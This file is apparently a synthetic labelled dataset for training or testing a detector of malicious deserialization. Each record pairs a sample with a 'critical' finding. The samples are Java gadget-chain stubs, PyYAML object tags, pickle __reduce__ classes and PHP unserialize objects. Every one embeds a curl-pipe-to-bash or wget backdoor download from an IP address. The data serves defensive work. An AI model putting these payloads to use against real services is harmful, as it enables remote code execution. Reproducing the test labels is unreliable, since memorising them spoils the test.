"text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://189.63.247.106/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://189.63.247.106/shell\")"}}]} {"id": "synth_malicious_deserialization_00420", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://190.101.116.163/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://162.39.148.7/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://190.101.116.163/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://162.39.148.7/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00421", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://53.180.19.49/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://146.7.183.34/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://53.180.19.49/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://146.7.183.34/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00422", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://111.179.241.241/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://31.53.203.153/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://111.179.241.241/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://31.53.203.153/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00423", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://48.114.35.30/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://48.114.35.30/shell\")"}}]} {"id": "synth_malicious_deserialization_00424", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://187.132.199.23/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://187.132.199.23/shell\")"}}]} {"id": "synth_malicious_deserialization_00425", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://51.109.139.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://131.11.126.138/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://51.109.139.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://131.11.126.138/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00426", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://85.193.18.249/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://85.193.18.249/shell\")"}}]} {"id": "synth_malicious_deserialization_00427", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://100.13.7.135/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://161.79.53.178/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://100.13.7.135/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://161.79.53.178/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00428", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('tpOP9AjvWw4zEVeb9F+2EUKXJAztihk8hm+039e12UJyRBqdMIg+MvUhSZH3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://66.84.42.203/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('tpOP9AjvWw4zEVeb9F+2EUKXJAztihk8hm+039e12UJyRBqdMIg+MvUhSZH3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00429", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://140.36.60.161/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://140.36.60.161/shell\")"}}]} {"id": "synth_malicious_deserialization_00430", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://164.155.39.159/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://5.2.235.50/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://164.155.39.159/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://5.2.235.50/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00431", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('XhN/AQN6b/bcVaLDpo3zbnGIJy+sIp2U92wIqfO/z9w49l9HjwK+F0J5UMnz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://86.223.24.9/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('XhN/AQN6b/bcVaLDpo3zbnGIJy+sIp2U92wIqfO/z9w49l9HjwK+F0J5UMnz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00432", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://3.205.49.105/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://3.205.49.105/shell\")"}}]} {"id": "synth_malicious_deserialization_00433", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('H38HgMhFTtmcrMG9xZkYIfC3xhR61UDUbFCtd7RI8kq629l1Uk51VgK1v3qc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://242.158.184.77/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('H38HgMhFTtmcrMG9xZkYIfC3xhR61UDUbFCtd7RI8kq629l1Uk51VgK1v3qc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00434", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:31:\"J06YGA68OQDspMicpg8VaZw7sHs1Y9T1ou7Ac9Eq\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://6.155.115.81/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:31:\"J06YGA68OQDspMicpg8VaZw7sHs1Y9T1ou7Ac9Eq\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://6.155.115.81/bd\")"}}]} {"id": "synth_malicious_deserialization_00435", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://183.33.141.186/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://183.33.141.186/shell\")"}}]} {"id": "synth_malicious_deserialization_00436", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://38.221.115.64/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://38.221.115.64/shell\")"}}]} {"id": "synth_malicious_deserialization_00437", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://242.28.239.208/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://107.255.55.42/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://242.28.239.208/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://107.255.55.42/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00438", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://36.174.59.119/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://36.174.59.119/shell\")"}}]} {"id": "synth_malicious_deserialization_00439", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://17.225.216.243/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://36.48.232.36/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://17.225.216.243/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://36.48.232.36/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00440", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('nHHFjV4hr/oqVkrL+Ky6q5QLiqIMVL4bD++bP1lZ46tyhmCVJb5ALvZlzqYn')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://162.183.56.154/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('nHHFjV4hr/oqVkrL+Ky6q5QLiqIMVL4bD++bP1lZ46tyhmCVJb5ALvZlzqYn')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00441", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://151.118.17.74/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://151.118.17.74/shell\")"}}]} {"id": "synth_malicious_deserialization_00442", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:41:\"1A1dUoHfCZe9tno5QNSTMzErE/3lqHzeTfassua3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.97.39.6/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:41:\"1A1dUoHfCZe9tno5QNSTMzErE/3lqHzeTfassua3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.97.39.6/bd\")"}}]} {"id": "synth_malicious_deserialization_00443", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('KCDPjOZDhMJbuMxqeiJec6ikzmWQojhXtfVcs6ZJxfvias+BwCz3cOMADIjS')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://19.47.116.133/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('KCDPjOZDhMJbuMxqeiJec6ikzmWQojhXtfVcs6ZJxfvias+BwCz3cOMADIjS')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00444", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://49.247.248.40/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://49.247.248.40/shell\")"}}]} {"id": "synth_malicious_deserialization_00445", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:46:\"Y9tRDNwLNiQ2Jm/HE9eTY5jeg8JeQ6l5MXKJGuBe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://50.4.12.76/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:46:\"Y9tRDNwLNiQ2Jm/HE9eTY5jeg8JeQ6l5MXKJGuBe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://50.4.12.76/bd\")"}}]} {"id": "synth_malicious_deserialization_00446", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://201.25.140.84/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://201.25.140.84/shell\")"}}]} {"id": "synth_malicious_deserialization_00447", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://22.199.94.25/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://22.199.94.25/shell\")"}}]} {"id": "synth_malicious_deserialization_00448", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://161.8.49.91/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://225.74.243.183/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://161.8.49.91/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://225.74.243.183/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00449", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:66:\"0FRjICUtDbJazlf1l316n8N4KsYXywnND9KMfzt4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.139.22.94/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:66:\"0FRjICUtDbJazlf1l316n8N4KsYXywnND9KMfzt4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.139.22.94/bd\")"}}]} {"id": "synth_malicious_deserialization_00450", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://241.163.38.237/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://241.163.38.237/shell\")"}}]} {"id": "synth_malicious_deserialization_00451", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://164.83.136.120/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://164.83.136.120/shell\")"}}]} {"id": "synth_malicious_deserialization_00452", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:58:\"yhgIiBcDJnT5NZYcgtlz1pyYfwHdK+t4jpzD6Orv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://165.239.182.87/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:58:\"yhgIiBcDJnT5NZYcgtlz1pyYfwHdK+t4jpzD6Orv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://165.239.182.87/bd\")"}}]} {"id": "synth_malicious_deserialization_00453", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('K/snp7e8bwS9tk7U1tr4Bdwlr7tMH/W16fJSQFIuHEAJj4Pdk5RlTsAsPnMy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://71.5.148.2/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('K/snp7e8bwS9tk7U1tr4Bdwlr7tMH/W16fJSQFIuHEAJj4Pdk5RlTsAsPnMy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00454", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:21:\"Hi53FrqlFL9jrqc38c5K8jp01sZSyDC2KhKv+fbt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://199.164.100.223/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:21:\"Hi53FrqlFL9jrqc38c5K8jp01sZSyDC2KhKv+fbt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://199.164.100.223/bd\")"}}]} {"id": "synth_malicious_deserialization_00455", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('/JOyzysTTRT6GS6cbtDsW6jY9GHiCdLa0ih2tmygydgRYUDVxAvP1079qUAL')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://55.157.38.11/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('/JOyzysTTRT6GS6cbtDsW6jY9GHiCdLa0ih2tmygydgRYUDVxAvP1079qUAL')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00456", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://38.88.181.77/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://44.37.8.114/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://38.88.181.77/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://44.37.8.114/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00457", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://155.237.114.240/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://155.237.114.240/shell\")"}}]} {"id": "synth_malicious_deserialization_00458", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://218.155.125.126/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://45.218.107.2/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://218.155.125.126/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://45.218.107.2/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00459", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://171.29.4.134/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://96.187.108.158/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://171.29.4.134/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://96.187.108.158/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00460", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:58:\"bpKN42KCwUeLpTzHNe0e66CATbfHV5s9ghIwb5vj\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://135.116.63.88/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:58:\"bpKN42KCwUeLpTzHNe0e66CATbfHV5s9ghIwb5vj\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://135.116.63.88/bd\")"}}]} {"id": "synth_malicious_deserialization_00461", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://180.19.111.38/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://234.253.237.224/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://180.19.111.38/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://234.253.237.224/backdoor', '-O', 